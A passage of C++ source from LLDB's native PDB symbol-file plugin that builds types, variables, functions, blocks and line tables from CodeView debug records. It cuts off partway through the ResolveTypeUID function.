SymbolFileNativePDB::CreateClassStructUnion(PdbTypeSymId type_id,
const TagRecord &record,
size_t size, CompilerType ct) {
std::string uname = GetUnqualifiedTypeName(record);
// FIXME: Search IPI stream for LF_UDT_MOD_SRC_LINE.
Declaration decl;
return std::make_shared<Type>(toOpaqueUid(type_id), this, ConstString(uname),
size, nullptr, LLDB_INVALID_UID,
Type::eEncodingIsUID, decl, ct,
Type::ResolveState::Forward);
}
lldb::TypeSP SymbolFileNativePDB::CreateTagType(PdbTypeSymId type_id,
const ClassRecord &cr,
CompilerType ct) {
return CreateClassStructUnion(type_id, cr, cr.getSize(), ct);
}
lldb::TypeSP SymbolFileNativePDB::CreateTagType(PdbTypeSymId type_id,
const UnionRecord &ur,
CompilerType ct) {
return CreateClassStructUnion(type_id, ur, ur.getSize(), ct);
}
lldb::TypeSP SymbolFileNativePDB::CreateTagType(PdbTypeSymId type_id,
const EnumRecord &er,
CompilerType ct) {
std::string uname = GetUnqualifiedTypeName(er);
Declaration decl;
TypeSP underlying_type = GetOrCreateType(er.UnderlyingType);
return std::make_shared<lldb_private::Type>(
toOpaqueUid(type_id), this, ConstString(uname),
underlying_type->GetByteSize(nullptr), nullptr, LLDB_INVALID_UID,
lldb_private::Type::eEncodingIsUID, decl, ct,
lldb_private::Type::ResolveState::Forward);
}
TypeSP SymbolFileNativePDB::CreateArrayType(PdbTypeSymId type_id,
const ArrayRecord &ar,
CompilerType ct) {
TypeSP element_type = GetOrCreateType(ar.ElementType);
Declaration decl;
TypeSP array_sp = std::make_shared<lldb_private::Type>(
toOpaqueUid(type_id), this, ConstString(), ar.Size, nullptr,
LLDB_INVALID_UID, lldb_private::Type::eEncodingIsUID, decl, ct,
lldb_private::Type::ResolveState::Full);
array_sp->SetEncodingType(element_type.get());
return array_sp;
}
TypeSP SymbolFileNativePDB::CreateFunctionType(PdbTypeSymId type_id,
const MemberFunctionRecord &mfr,
CompilerType ct) {
Declaration decl;
return std::make_shared<lldb_private::Type>(
toOpaqueUid(type_id), this, ConstString(), 0, nullptr, LLDB_INVALID_UID,
lldb_private::Type::eEncodingIsUID, decl, ct,
lldb_private::Type::ResolveState::Full);
}
TypeSP SymbolFileNativePDB::CreateProcedureType(PdbTypeSymId type_id,
const ProcedureRecord &pr,
CompilerType ct) {
Declaration decl;
return std::make_shared<lldb_private::Type>(
toOpaqueUid(type_id), this, ConstString(), 0, nullptr, LLDB_INVALID_UID,
lldb_private::Type::eEncodingIsUID, decl, ct,
lldb_private::Type::ResolveState::Full);
}
TypeSP SymbolFileNativePDB::CreateType(PdbTypeSymId type_id, CompilerType ct) {
if (type_id.index.isSimple())
return CreateSimpleType(type_id.index, ct);
TpiStream &stream = type_id.is_ipi ? m_index->ipi() : m_index->tpi();
CVType cvt = stream.getType(type_id.index);
if (cvt.kind() == LF_MODIFIER) {
ModifierRecord modifier;
llvm::cantFail(
TypeDeserializer::deserializeAs<ModifierRecord>(cvt, modifier));
return CreateModifierType(type_id, modifier, ct);
}
if (cvt.kind() == LF_POINTER) {
PointerRecord pointer;
llvm::cantFail(
TypeDeserializer::deserializeAs<PointerRecord>(cvt, pointer));
return CreatePointerType(type_id, pointer, ct);
}
if (IsClassRecord(cvt.kind())) {
ClassRecord cr;
llvm::cantFail(TypeDeserializer::deserializeAs<ClassRecord>(cvt, cr));
return CreateTagType(type_id, cr, ct);
}
if (cvt.kind() == LF_ENUM) {
EnumRecord er;
llvm::cantFail(TypeDeserializer::deserializeAs<EnumRecord>(cvt, er));
return CreateTagType(type_id, er, ct);
}
if (cvt.kind() == LF_UNION) {
UnionRecord ur;
llvm::cantFail(TypeDeserializer::deserializeAs<UnionRecord>(cvt, ur));
return CreateTagType(type_id, ur, ct);
}
if (cvt.kind() == LF_ARRAY) {
ArrayRecord ar;
llvm::cantFail(TypeDeserializer::deserializeAs<ArrayRecord>(cvt, ar));
return CreateArrayType(type_id, ar, ct);
}
if (cvt.kind() == LF_PROCEDURE) {
ProcedureRecord pr;
llvm::cantFail(TypeDeserializer::deserializeAs<ProcedureRecord>(cvt, pr));
return CreateProcedureType(type_id, pr, ct);
}
if (cvt.kind() == LF_MFUNCTION) {
MemberFunctionRecord mfr;
llvm::cantFail(TypeDeserializer::deserializeAs<MemberFunctionRecord>(cvt, mfr));
return CreateFunctionType(type_id, mfr, ct);
}
return nullptr;
}
TypeSP SymbolFileNativePDB::CreateAndCacheType(PdbTypeSymId type_id) {
// If they search for a UDT which is a forward ref, try and resolve the full
// decl and just map the forward ref uid to the full decl record.
llvm::Optional<PdbTypeSymId> full_decl_uid;
if (IsForwardRefUdt(type_id, m_index->tpi())) {
auto expected_full_ti =
m_index->tpi().findFullDeclForForwardRef(type_id.index);
if (!expected_full_ti)
llvm::consumeError(expected_full_ti.takeError());
else if (*expected_full_ti != type_id.index) {
full_decl_uid = PdbTypeSymId(*expected_full_ti, false);
// It's possible that a lookup would occur for the full decl causing it
// to be cached, then a second lookup would occur for the forward decl.
// We don't want to create a second full decl, so make sure the full
// decl hasn't already been cached.
auto full_iter = m_types.find(toOpaqueUid(*full_decl_uid));
if (full_iter != m_types.end()) {
TypeSP result = full_iter->second;
// Map the forward decl to the TypeSP for the full decl so we can take
// the fast path next time.
m_types[toOpaqueUid(type_id)] = result;
return result;
}
}
}
PdbTypeSymId best_decl_id = full_decl_uid ? *full_decl_uid : type_id;
clang::QualType qt = m_ast->GetOrCreateType(best_decl_id);
TypeSP result = CreateType(best_decl_id, m_ast->ToCompilerType(qt));
if (!result)
return nullptr;
uint64_t best_uid = toOpaqueUid(best_decl_id);
m_types[best_uid] = result;
// If we had both a forward decl and a full decl, make both point to the new
// type.
if (full_decl_uid)
m_types[toOpaqueUid(type_id)] = result;
return result;
}
TypeSP SymbolFileNativePDB::GetOrCreateType(PdbTypeSymId type_id) {
// We can't use try_emplace / overwrite here because the process of creating
// a type could create nested types, which could invalidate iterators. So
// we have to do a 2-phase lookup / insert.
auto iter = m_types.find(toOpaqueUid(type_id));
if (iter != m_types.end())
return iter->second;
TypeSP type = CreateAndCacheType(type_id);
if (type)
GetTypeList().Insert(type);
return type;
}
VariableSP SymbolFileNativePDB::CreateGlobalVariable(PdbGlobalSymId var_id) {
CVSymbol sym = m_index->symrecords().readRecord(var_id.offset);
if (sym.kind() == S_CONSTANT)
return CreateConstantSymbol(var_id, sym);
lldb::ValueType scope = eValueTypeInvalid;
TypeIndex ti;
llvm::StringRef name;
lldb::addr_t addr = 0;
uint16_t section = 0;
uint32_t offset = 0;
bool is_external = false;
switch (sym.kind()) {
case S_GDATA32:
is_external = true;
LLVM_FALLTHROUGH;
case S_LDATA32: {
DataSym ds(sym.kind());
llvm::cantFail(SymbolDeserializer::deserializeAs<DataSym>(sym, ds));
ti = ds.Type;
scope = (sym.kind() == S_GDATA32) ? eValueTypeVariableGlobal
: eValueTypeVariableStatic;
name = ds.Name;
section = ds.Segment;
offset = ds.DataOffset;
addr = m_index->MakeVirtualAddress(ds.Segment, ds.DataOffset);
break;
}
case S_GTHREAD32:
is_external = true;
LLVM_FALLTHROUGH;
case S_LTHREAD32: {
ThreadLocalDataSym tlds(sym.kind());
llvm::cantFail(
SymbolDeserializer::deserializeAs<ThreadLocalDataSym>(sym, tlds));
ti = tlds.Type;
name = tlds.Name;
section = tlds.Segment;
offset = tlds.DataOffset;
addr = m_index->MakeVirtualAddress(tlds.Segment, tlds.DataOffset);
scope = eValueTypeVariableThreadLocal;
break;
}
default:
llvm_unreachable("unreachable!");
}
CompUnitSP comp_unit;
llvm::Optional<uint16_t> modi = m_index->GetModuleIndexForVa(addr);
if (modi) {
CompilandIndexItem &cci = m_index->compilands().GetOrCreateCompiland(*modi);
comp_unit = GetOrCreateCompileUnit(cci);
}
Declaration decl;
PdbTypeSymId tid(ti, false);
SymbolFileTypeSP type_sp =
std::make_shared<SymbolFileType>(*this, toOpaqueUid(tid));
Variable::RangeList ranges;
m_ast->GetOrCreateVariableDecl(var_id);
DWARFExpression location = MakeGlobalLocationExpression(
section, offset, GetObjectFile()->GetModule());
std::string global_name("::");
global_name += name;
VariableSP var_sp = std::make_shared<Variable>(
toOpaqueUid(var_id), name.str().c_str(), global_name.c_str(), type_sp,
scope, comp_unit.get(), ranges, &decl, location, is_external, false,
false);
var_sp->SetLocationIsConstantValueData(false);
return var_sp;
}
lldb::VariableSP
SymbolFileNativePDB::CreateConstantSymbol(PdbGlobalSymId var_id,
const CVSymbol &cvs) {
TpiStream &tpi = m_index->tpi();
ConstantSym constant(cvs.kind());
llvm::cantFail(SymbolDeserializer::deserializeAs<ConstantSym>(cvs, constant));
std::string global_name("::");
global_name += constant.Name;
PdbTypeSymId tid(constant.Type, false);
SymbolFileTypeSP type_sp =
std::make_shared<SymbolFileType>(*this, toOpaqueUid(tid));
Declaration decl;
Variable::RangeList ranges;
ModuleSP module = GetObjectFile()->GetModule();
DWARFExpression location = MakeConstantLocationExpression(
constant.Type, tpi, constant.Value, module);
VariableSP var_sp = std::make_shared<Variable>(
toOpaqueUid(var_id), constant.Name.str().c_str(), global_name.c_str(),
type_sp, eValueTypeVariableGlobal, module.get(), ranges, &decl, location,
false, false, false);
var_sp->SetLocationIsConstantValueData(true);
return var_sp;
}
VariableSP
SymbolFileNativePDB::GetOrCreateGlobalVariable(PdbGlobalSymId var_id) {
auto emplace_result = m_global_vars.try_emplace(toOpaqueUid(var_id), nullptr);
if (emplace_result.second)
emplace_result.first->second = CreateGlobalVariable(var_id);
return emplace_result.first->second;
}
lldb::TypeSP SymbolFileNativePDB::GetOrCreateType(TypeIndex ti) {
return GetOrCreateType(PdbTypeSymId(ti, false));
}
FunctionSP SymbolFileNativePDB::GetOrCreateFunction(PdbCompilandSymId func_id,
CompileUnit &comp_unit) {
auto emplace_result = m_functions.try_emplace(toOpaqueUid(func_id), nullptr);
if (emplace_result.second)
emplace_result.first->second = CreateFunction(func_id, comp_unit);
return emplace_result.first->second;
}
CompUnitSP
SymbolFileNativePDB::GetOrCreateCompileUnit(const CompilandIndexItem &cci) {
auto emplace_result =
m_compilands.try_emplace(toOpaqueUid(cci.m_id), nullptr);
if (emplace_result.second)
emplace_result.first->second = CreateCompileUnit(cci);
lldbassert(emplace_result.first->second);
return emplace_result.first->second;
}
Block &SymbolFileNativePDB::GetOrCreateBlock(PdbCompilandSymId block_id) {
auto iter = m_blocks.find(toOpaqueUid(block_id));
if (iter != m_blocks.end())
return *iter->second;
return CreateBlock(block_id);
}
void SymbolFileNativePDB::ParseDeclsForContext(
lldb_private::CompilerDeclContext decl_ctx) {
clang::DeclContext *context = m_ast->FromCompilerDeclContext(decl_ctx);
if (!context)
return;
m_ast->ParseDeclsForContext(*context);
}
lldb::CompUnitSP SymbolFileNativePDB::ParseCompileUnitAtIndex(uint32_t index) {
if (index >= GetNumCompileUnits())
return CompUnitSP();
lldbassert(index < UINT16_MAX);
if (index >= UINT16_MAX)
return nullptr;
CompilandIndexItem &item = m_index->compilands().GetOrCreateCompiland(index);
return GetOrCreateCompileUnit(item);
}
lldb::LanguageType SymbolFileNativePDB::ParseLanguage(CompileUnit &comp_unit) {
std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
PdbSymUid uid(comp_unit.GetID());
lldbassert(uid.kind() == PdbSymUidKind::Compiland);
CompilandIndexItem *item =
m_index->compilands().GetCompiland(uid.asCompiland().modi);
lldbassert(item);
if (!item->m_compile_opts)
return lldb::eLanguageTypeUnknown;
return TranslateLanguage(item->m_compile_opts->getLanguage());
}
void SymbolFileNativePDB::AddSymbols(Symtab &symtab) { return; }
size_t SymbolFileNativePDB::ParseFunctions(CompileUnit &comp_unit) {
std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
PdbSymUid uid{comp_unit.GetID()};
lldbassert(uid.kind() == PdbSymUidKind::Compiland);
uint16_t modi = uid.asCompiland().modi;
CompilandIndexItem &cii = m_index->compilands().GetOrCreateCompiland(modi);
size_t count = comp_unit.GetNumFunctions();
const CVSymbolArray &syms = cii.m_debug_stream.getSymbolArray();
for (auto iter = syms.begin(); iter != syms.end(); ++iter) {
if (iter->kind() != S_LPROC32 && iter->kind() != S_GPROC32)
continue;
PdbCompilandSymId sym_id{modi, iter.offset()};
FunctionSP func = GetOrCreateFunction(sym_id, comp_unit);
}
size_t new_count = comp_unit.GetNumFunctions();
lldbassert(new_count >= count);
return new_count - count;
}
static bool NeedsResolvedCompileUnit(uint32_t resolve_scope) {
// If any of these flags are set, we need to resolve the compile unit.
uint32_t flags = eSymbolContextCompUnit;
flags |= eSymbolContextVariable;
flags |= eSymbolContextFunction;
flags |= eSymbolContextBlock;
flags |= eSymbolContextLineEntry;
return (resolve_scope & flags) != 0;
}
uint32_t SymbolFileNativePDB::ResolveSymbolContext(
const Address &addr, SymbolContextItem resolve_scope, SymbolContext &sc) {
std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
uint32_t resolved_flags = 0;
lldb::addr_t file_addr = addr.GetFileAddress();
if (NeedsResolvedCompileUnit(resolve_scope)) {
llvm::Optional<uint16_t> modi = m_index->GetModuleIndexForVa(file_addr);
if (!modi)
return 0;
CompilandIndexItem *cci = m_index->compilands().GetCompiland(*modi);
if (!cci)
return 0;
sc.comp_unit = GetOrCreateCompileUnit(*cci).get();
resolved_flags |= eSymbolContextCompUnit;
}
if (resolve_scope & eSymbolContextFunction ||
resolve_scope & eSymbolContextBlock) {
lldbassert(sc.comp_unit);
std::vector<SymbolAndUid> matches = m_index->FindSymbolsByVa(file_addr);
// Search the matches in reverse. This way if there are multiple matches
// (for example we are 3 levels deep in a nested scope) it will find the
// innermost one first.
for (const auto &match : llvm::reverse(matches)) {
if (match.uid.kind() != PdbSymUidKind::CompilandSym)
continue;
PdbCompilandSymId csid = match.uid.asCompilandSym();
CVSymbol cvs = m_index->ReadSymbolRecord(csid);
PDB_SymType type = CVSymToPDBSym(cvs.kind());
if (type != PDB_SymType::Function && type != PDB_SymType::Block)
continue;
if (type == PDB_SymType::Function) {
sc.function = GetOrCreateFunction(csid, *sc.comp_unit).get();
sc.block = sc.GetFunctionBlock();
}
if (type == PDB_SymType::Block) {
sc.block = &GetOrCreateBlock(csid);
sc.function = sc.block->CalculateSymbolContextFunction();
}
resolved_flags |= eSymbolContextFunction;
resolved_flags |= eSymbolContextBlock;
break;
}
}
if (resolve_scope & eSymbolContextLineEntry) {
lldbassert(sc.comp_unit);
if (auto *line_table = sc.comp_unit->GetLineTable()) {
if (line_table->FindLineEntryByAddress(addr, sc.line_entry))
resolved_flags |= eSymbolContextLineEntry;
}
}
return resolved_flags;
}
uint32_t SymbolFileNativePDB::ResolveSymbolContext(
const FileSpec &file_spec, uint32_t line, bool check_inlines,
lldb::SymbolContextItem resolve_scope, SymbolContextList &sc_list) {
return 0;
}
static void AppendLineEntryToSequence(LineTable &table, LineSequence &sequence,
const CompilandIndexItem &cci,
lldb::addr_t base_addr,
uint32_t file_number,
const LineFragmentHeader &block,
const LineNumberEntry &cur) {
LineInfo cur_info(cur.Flags);
if (cur_info.isAlwaysStepInto() || cur_info.isNeverStepInto())
return;
uint64_t addr = base_addr + cur.Offset;
bool is_statement = cur_info.isStatement();
bool is_prologue = IsFunctionPrologue(cci, addr);
bool is_epilogue = IsFunctionEpilogue(cci, addr);
uint32_t lno = cur_info.getStartLine();
table.AppendLineEntryToSequence(&sequence, addr, lno, 0, file_number,
is_statement, false, is_prologue, is_epilogue,
false);
}
static void TerminateLineSequence(LineTable &table,
const LineFragmentHeader &block,
lldb::addr_t base_addr, uint32_t file_number,
uint32_t last_line,
std::unique_ptr<LineSequence> seq) {
// The end is always a terminal entry, so insert it regardless.
table.AppendLineEntryToSequence(seq.get(), base_addr + block.CodeSize,
last_line, 0, file_number, false, false,
false, false, true);
table.InsertSequence(seq.release());
}
bool SymbolFileNativePDB::ParseLineTable(CompileUnit &comp_unit) {
// Unfortunately LLDB is set up to parse the entire compile unit line table
// all at once, even if all it really needs is line info for a specific
// function. In the future it would be nice if it could set the sc.m_function
// member, and we could only get the line info for the function in question.
std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
PdbSymUid cu_id(comp_unit.GetID());
lldbassert(cu_id.kind() == PdbSymUidKind::Compiland);
CompilandIndexItem *cci =
m_index->compilands().GetCompiland(cu_id.asCompiland().modi);
lldbassert(cci);
auto line_table = std::make_unique<LineTable>(&comp_unit);
// This is basically a copy of the .debug$S subsections from all original COFF
// object files merged together with address relocations applied. We are
// looking for all DEBUG_S_LINES subsections.
for (const DebugSubsectionRecord &dssr :
cci->m_debug_stream.getSubsectionsArray()) {
if (dssr.kind() != DebugSubsectionKind::Lines)
continue;
DebugLinesSubsectionRef lines;
llvm::BinaryStreamReader reader(dssr.getRecordData());
if (auto EC = lines.initialize(reader)) {
llvm::consumeError(std::move(EC));
return false;
}
const LineFragmentHeader *lfh = lines.header();
uint64_t virtual_addr =
m_index->MakeVirtualAddress(lfh->RelocSegment, lfh->RelocOffset);
const auto &checksums = cci->m_strings.checksums().getArray();
const auto &strings = cci->m_strings.strings();
for (const LineColumnEntry &group : lines) {
// Indices in this structure are actually offsets of records in the
// DEBUG_S_FILECHECKSUMS subsection. Those entries then have an index
// into the global PDB string table.
auto iter = checksums.at(group.NameIndex);
if (iter == checksums.end())
continue;
llvm::Expected<llvm::StringRef> efn =
strings.getString(iter->FileNameOffset);
if (!efn) {
llvm::consumeError(efn.takeError());
continue;
}
// LLDB wants the index of the file in the list of support files.
auto fn_iter = llvm::find(cci->m_file_list, *efn);
lldbassert(fn_iter != cci->m_file_list.end());
uint32_t file_index = std::distance(cci->m_file_list.begin(), fn_iter);
std::unique_ptr<LineSequence> sequence(
line_table->CreateLineSequenceContainer());
lldbassert(!group.LineNumbers.empty());
for (const LineNumberEntry &entry : group.LineNumbers) {
AppendLineEntryToSequence(*line_table, *sequence, *cci, virtual_addr,
file_index, *lfh, entry);
}
LineInfo last_line(group.LineNumbers.back().Flags);
TerminateLineSequence(*line_table, *lfh, virtual_addr, file_index,
last_line.getEndLine(), std::move(sequence));
}
}
if (line_table->GetSize() == 0)
return false;
comp_unit.SetLineTable(line_table.release());
return true;
}
bool SymbolFileNativePDB::ParseDebugMacros(CompileUnit &comp_unit) {
// PDB doesn't contain information about macros
return false;
}
bool SymbolFileNativePDB::ParseSupportFiles(CompileUnit &comp_unit,
FileSpecList &support_files) {
std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
PdbSymUid cu_id(comp_unit.GetID());
lldbassert(cu_id.kind() == PdbSymUidKind::Compiland);
CompilandIndexItem *cci =
m_index->compilands().GetCompiland(cu_id.asCompiland().modi);
lldbassert(cci);
for (llvm::StringRef f : cci->m_file_list) {
FileSpec::Style style =
f.startswith("/") ? FileSpec::Style::posix : FileSpec::Style::windows;
FileSpec spec(f, style);
support_files.Append(spec);
}
return true;
}
bool SymbolFileNativePDB::ParseImportedModules(
const SymbolContext &sc, std::vector<SourceModule> &imported_modules) {
// PDB does not yet support module debug info
return false;
}
size_t SymbolFileNativePDB::ParseBlocksRecursive(Function &func) {
std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
GetOrCreateBlock(PdbSymUid(func.GetID()).asCompilandSym());
// FIXME: Parse child blocks
return 1;
}
void SymbolFileNativePDB::DumpClangAST(Stream &s) { m_ast->Dump(s); }
void SymbolFileNativePDB::FindGlobalVariables(
ConstString name, const CompilerDeclContext &parent_decl_ctx,
uint32_t max_matches, VariableList &variables) {
std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
using SymbolAndOffset = std::pair<uint32_t, llvm::codeview::CVSymbol>;
std::vector<SymbolAndOffset> results = m_index->globals().findRecordsByName(
name.GetStringRef(), m_index->symrecords());
for (const SymbolAndOffset &result : results) {
VariableSP var;
switch (result.second.kind()) {
case SymbolKind::S_GDATA32:
case SymbolKind::S_LDATA32:
case SymbolKind::S_GTHREAD32:
case SymbolKind::S_LTHREAD32:
case SymbolKind::S_CONSTANT: {
PdbGlobalSymId global(result.first, false);
var = GetOrCreateGlobalVariable(global);
variables.AddVariable(var);
break;
}
default:
continue;
}
}
}
void SymbolFileNativePDB::FindFunctions(
ConstString name, const CompilerDeclContext &parent_decl_ctx,
FunctionNameType name_type_mask, bool include_inlines,
SymbolContextList &sc_list) {
std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
// For now we only support lookup by method name.
if (!(name_type_mask & eFunctionNameTypeMethod))
return;
using SymbolAndOffset = std::pair<uint32_t, llvm::codeview::CVSymbol>;
std::vector<SymbolAndOffset> matches = m_index->globals().findRecordsByName(
name.GetStringRef(), m_index->symrecords());
for (const SymbolAndOffset &match : matches) {
if (match.second.kind() != S_PROCREF && match.second.kind() != S_LPROCREF)
continue;
ProcRefSym proc(match.second.kind());
cantFail(SymbolDeserializer::deserializeAs<ProcRefSym>(match.second, proc));
if (!IsValidRecord(proc))
continue;
CompilandIndexItem &cci =
m_index->compilands().GetOrCreateCompiland(proc.modi());
SymbolContext sc;
sc.comp_unit = GetOrCreateCompileUnit(cci).get();
PdbCompilandSymId func_id(proc.modi(), proc.SymOffset);
sc.function = GetOrCreateFunction(func_id, *sc.comp_unit).get();
sc_list.Append(sc);
}
}
void SymbolFileNativePDB::FindFunctions(const RegularExpression ®ex,
bool include_inlines,
SymbolContextList &sc_list) {}
void SymbolFileNativePDB::FindTypes(
ConstString name, const CompilerDeclContext &parent_decl_ctx,
uint32_t max_matches, llvm::DenseSet<SymbolFile *> &searched_symbol_files,
TypeMap &types) {
std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
if (!name)
return;
searched_symbol_files.clear();
searched_symbol_files.insert(this);
// There is an assumption 'name' is not a regex
FindTypesByName(name.GetStringRef(), max_matches, types);
}
void SymbolFileNativePDB::FindTypes(
llvm::ArrayRef<CompilerContext> pattern, LanguageSet languages,
llvm::DenseSet<SymbolFile *> &searched_symbol_files, TypeMap &types) {}
void SymbolFileNativePDB::FindTypesByName(llvm::StringRef name,
uint32_t max_matches,
TypeMap &types) {
std::vector<TypeIndex> matches = m_index->tpi().findRecordsByName(name);
if (max_matches > 0 && max_matches < matches.size())
matches.resize(max_matches);
for (TypeIndex ti : matches) {
TypeSP type = GetOrCreateType(ti);
if (!type)
continue;
types.Insert(type);
}
}
size_t SymbolFileNativePDB::ParseTypes(CompileUnit &comp_unit) {
std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
// Only do the full type scan the first time.
if (m_done_full_type_scan)
return 0;
const size_t old_count = GetTypeList().GetSize();
LazyRandomTypeCollection &types = m_index->tpi().typeCollection();
// First process the entire TPI stream.
for (auto ti = types.getFirst(); ti; ti = types.getNext(*ti)) {
TypeSP type = GetOrCreateType(*ti);
if (type)
(void)type->GetFullCompilerType();
}
// Next look for S_UDT records in the globals stream.
for (const uint32_t gid : m_index->globals().getGlobalsTable()) {
PdbGlobalSymId global{gid, false};
CVSymbol sym = m_index->ReadSymbolRecord(global);
if (sym.kind() != S_UDT)
continue;
UDTSym udt = llvm::cantFail(SymbolDeserializer::deserializeAs<UDTSym>(sym));
bool is_typedef = true;
if (IsTagRecord(PdbTypeSymId{udt.Type, false}, m_index->tpi())) {
CVType cvt = m_index->tpi().getType(udt.Type);
llvm::StringRef name = CVTagRecord::create(cvt).name();
if (name == udt.Name)
is_typedef = false;
}
if (is_typedef)
GetOrCreateTypedef(global);
}
const size_t new_count = GetTypeList().GetSize();
m_done_full_type_scan = true;
return new_count - old_count;
}
size_t
SymbolFileNativePDB::ParseVariablesForCompileUnit(CompileUnit &comp_unit,
VariableList &variables) {
PdbSymUid sym_uid(comp_unit.GetID());
lldbassert(sym_uid.kind() == PdbSymUidKind::Compiland);
return 0;
}
VariableSP SymbolFileNativePDB::CreateLocalVariable(PdbCompilandSymId scope_id,
PdbCompilandSymId var_id,
bool is_param) {
ModuleSP module = GetObjectFile()->GetModule();
Block &block = GetOrCreateBlock(scope_id);
VariableInfo var_info =
GetVariableLocationInfo(*m_index, var_id, block, module);
if (!var_info.location || !var_info.ranges)
return nullptr;
CompilandIndexItem *cii = m_index->compilands().GetCompiland(var_id.modi);
CompUnitSP comp_unit_sp = GetOrCreateCompileUnit(*cii);
TypeSP type_sp = GetOrCreateType(var_info.type);
std::string name = var_info.name.str();
Declaration decl;
SymbolFileTypeSP sftype =
std::make_shared<SymbolFileType>(*this, type_sp->GetID());
ValueType var_scope =
is_param ? eValueTypeVariableArgument : eValueTypeVariableLocal;
VariableSP var_sp = std::make_shared<Variable>(
toOpaqueUid(var_id), name.c_str(), name.c_str(), sftype, var_scope,
comp_unit_sp.get(), *var_info.ranges, &decl, *var_info.location, false,
false, false);
if (!is_param)
m_ast->GetOrCreateVariableDecl(scope_id, var_id);
m_local_variables[toOpaqueUid(var_id)] = var_sp;
return var_sp;
}
VariableSP SymbolFileNativePDB::GetOrCreateLocalVariable(
PdbCompilandSymId scope_id, PdbCompilandSymId var_id, bool is_param) {
auto iter = m_local_variables.find(toOpaqueUid(var_id));
if (iter != m_local_variables.end())
return iter->second;
return CreateLocalVariable(scope_id, var_id, is_param);
}
TypeSP SymbolFileNativePDB::CreateTypedef(PdbGlobalSymId id) {
CVSymbol sym = m_index->ReadSymbolRecord(id);
lldbassert(sym.kind() == SymbolKind::S_UDT);
UDTSym udt = llvm::cantFail(SymbolDeserializer::deserializeAs<UDTSym>(sym));
TypeSP target_type = GetOrCreateType(udt.Type);
(void)m_ast->GetOrCreateTypedefDecl(id);
Declaration decl;
return std::make_shared<lldb_private::Type>(
toOpaqueUid(id), this, ConstString(udt.Name),
target_type->GetByteSize(nullptr), nullptr, target_type->GetID(),
lldb_private::Type::eEncodingIsTypedefUID, decl,
target_type->GetForwardCompilerType(),
lldb_private::Type::ResolveState::Forward);
}
TypeSP SymbolFileNativePDB::GetOrCreateTypedef(PdbGlobalSymId id) {
auto iter = m_types.find(toOpaqueUid(id));
if (iter != m_types.end())
return iter->second;
return CreateTypedef(id);
}
size_t SymbolFileNativePDB::ParseVariablesForBlock(PdbCompilandSymId block_id) {
Block &block = GetOrCreateBlock(block_id);
size_t count = 0;
CompilandIndexItem *cii = m_index->compilands().GetCompiland(block_id.modi);
CVSymbol sym = cii->m_debug_stream.readSymbolAtOffset(block_id.offset);
uint32_t params_remaining = 0;
switch (sym.kind()) {
case S_GPROC32:
case S_LPROC32: {
ProcSym proc(static_cast<SymbolRecordKind>(sym.kind()));
cantFail(SymbolDeserializer::deserializeAs<ProcSym>(sym, proc));
CVType signature = m_index->tpi().getType(proc.FunctionType);
ProcedureRecord sig;
cantFail(TypeDeserializer::deserializeAs<ProcedureRecord>(signature, sig));
params_remaining = sig.getParameterCount();
break;
}
case S_BLOCK32:
break;
default:
lldbassert(false && "Symbol is not a block!");
return 0;
}
VariableListSP variables = block.GetBlockVariableList(false);
if (!variables) {
variables = std::make_shared<VariableList>();
block.SetVariableList(variables);
}
CVSymbolArray syms = limitSymbolArrayToScope(
cii->m_debug_stream.getSymbolArray(), block_id.offset);
// Skip the first record since it's a PROC32 or BLOCK32, and there's
// no point examining it since we know it's not a local variable.
syms.drop_front();
auto iter = syms.begin();
auto end = syms.end();
while (iter != end) {
uint32_t record_offset = iter.offset();
CVSymbol variable_cvs = *iter;
PdbCompilandSymId child_sym_id(block_id.modi, record_offset);
++iter;
// If this is a block, recurse into its children and then skip it.
if (variable_cvs.kind() == S_BLOCK32) {
uint32_t block_end = getScopeEndOffset(variable_cvs);
count += ParseVariablesForBlock(child_sym_id);
iter = syms.at(block_end);
continue;
}
bool is_param = params_remaining > 0;
VariableSP variable;
switch (variable_cvs.kind()) {
case S_REGREL32:
case S_REGISTER:
case S_LOCAL:
variable = GetOrCreateLocalVariable(block_id, child_sym_id, is_param);
if (is_param)
--params_remaining;
if (variable)
variables->AddVariableIfUnique(variable);
break;
default:
break;
}
}
// Pass false for set_children, since we call this recursively so that the
// children will call this for themselves.
block.SetDidParseVariables(true, false);
return count;
}
size_t SymbolFileNativePDB::ParseVariablesForContext(const SymbolContext &sc) {
std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
lldbassert(sc.function || sc.comp_unit);
VariableListSP variables;
if (sc.block) {
PdbSymUid block_id(sc.block->GetID());
size_t count = ParseVariablesForBlock(block_id.asCompilandSym());
return count;
}
if (sc.function) {
PdbSymUid block_id(sc.function->GetID());
size_t count = ParseVariablesForBlock(block_id.asCompilandSym());
return count;
}
if (sc.comp_unit) {
variables = sc.comp_unit->GetVariableList(false);
if (!variables) {
variables = std::make_shared<VariableList>();
sc.comp_unit->SetVariableList(variables);
}
return ParseVariablesForCompileUnit(*sc.comp_unit, *variables);
}
llvm_unreachable("Unreachable!");
}
CompilerDecl SymbolFileNativePDB::GetDeclForUID(lldb::user_id_t uid) {
if (auto decl = m_ast->GetOrCreateDeclForUid(uid))
return decl.getValue();
else
return CompilerDecl();
}
CompilerDeclContext
SymbolFileNativePDB::GetDeclContextForUID(lldb::user_id_t uid) {
clang::DeclContext *context =
m_ast->GetOrCreateDeclContextForUid(PdbSymUid(uid));
if (!context)
return {};
return m_ast->ToCompilerDeclContext(*context);
}
CompilerDeclContext
SymbolFileNativePDB::GetDeclContextContainingUID(lldb::user_id_t uid) {
clang::DeclContext *context = m_ast->GetParentDeclContext(PdbSymUid(uid));
return m_ast->ToCompilerDeclContext(*context);
}
Type *SymbolFileNativePDB::ResolveTypeUID(lldb::user_id_t type_uid) {
std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
auto iter = m_types.find(type_uid);
// lldb should not be passing us non-sensical type uids. the only way it
// could have a type uid in the first place is if we handed it out, in which
// case we should know about the type. However, that doesn't mean we've
// instantiated it yet. We can vend out a UID for a future type. So if the
// type doesn't exist, let's instantiate it now.
if (iter != m_types.end())
return &*iter->second;
